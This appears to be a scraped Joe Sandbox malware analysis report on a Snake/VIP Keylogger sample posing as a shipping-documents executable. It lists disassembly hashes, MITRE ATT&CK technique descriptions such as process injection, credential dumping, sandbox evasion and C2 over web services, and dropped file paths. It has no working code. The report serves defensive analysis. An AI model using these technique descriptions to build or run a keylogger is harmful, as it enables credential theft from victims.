Snapshot File: hcaresult_14_2_30a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc7d95e930c3eea9f9caa4a8ce5e9b5cd64ba1bfe94f51e9737436ff17f2841a
Instruction ID: def143b6059df658e2089b5dc3948d17b27f13cf8b47f3e2ae2ef0d4750922b5
Opcode Fuzzy Hash: fc7d95e930c3eea9f9caa4a8ce5e9b5cd64ba1bfe94f51e9737436ff17f2841a
Instruction Fuzzy Hash: 1FD05B31D2022B97CB00E7A5DC044DFF738EED5261B504666D51537140FB713659C6E1

Function 030A6739 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3920770467.00000000030A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_30a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4329fbe71dec8061af6d667edd73951dfd8ec9e76b3b45ed17cc06836f1206b7
Instruction ID: ecce0283c67e47c5fae7007abb7a5330c4707c88abab3082f2368a3297b60867
Opcode Fuzzy Hash: 4329fbe71dec8061af6d667edd73951dfd8ec9e76b3b45ed17cc06836f1206b7
Instruction Fuzzy Hash: BBD05E3204030A8BD641B7B8EE4A7D63B2AEB81520F648530A0455AE4BEFB958455B71

Function 030AD6D4 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3920770467.00000000030A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_30a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df9c9b0a250bd07f4709dc88fc641b784c6abb6587cfcb8bcf43452e13187a87
Instruction ID: cc4e08f13677c762e70872a11da55aaca696a06c732ecb3aaa7f6ff341f94cbf
Opcode Fuzzy Hash: df9c9b0a250bd07f4709dc88fc641b784c6abb6587cfcb8bcf43452e13187a87
Instruction Fuzzy Hash: D3D04235E1450DCBCB20DFB8F4994DCBB71EB89325B10546BE929E3651DA3054558F12

Function 030AAFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3920770467.00000000030A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_30a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e92b53842455a36f006cff1bfa877892712ab83d9c292a38f7343106b53f388d
Instruction ID: 165a4ae6fd3c37de0c23b36ef6ea404e5cf3f245ed9d03501ef52c83ea5c0e36
Opcode Fuzzy Hash: e92b53842455a36f006cff1bfa877892712ab83d9c292a38f7343106b53f388d
Instruction Fuzzy Hash: 20D0677BB40008EFCB049F98E840ADDF776FB98221B448117F915E3260C6319965DB50

Function 030A6748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3920770467.00000000030A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_30a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6789287e89d787e91c7d2620d4d4e1cbc6fbd1264b6ce99e76f54f4a2e9a4e9a
Instruction ID: 344a52c8dfdfc675475a745fa944b47c14c9285234ff711ad63d01504729bd92
Opcode Fuzzy Hash: 6789287e89d787e91c7d2620d4d4e1cbc6fbd1264b6ce99e76f54f4a2e9a4e9a
Instruction Fuzzy Hash: 9CC0123004030C8BD501FBB9FD455D5331EBAC0504F509A30A0051AA49FF7D2C454BA1

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report rShippingDocuments240384.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rShippingDocuments240384.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\tdcorV.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1myx12ag.trk.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2uc2muka.4ty.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2wc4svgu.rji.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2yorotv0.xwp.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dg5idzg5.erb.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gkgu4j4c.whd.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uvhb5fno.l5w.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ywurvwk4.dxa.ps1

Windows Analysis Report
rShippingDocuments240384.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre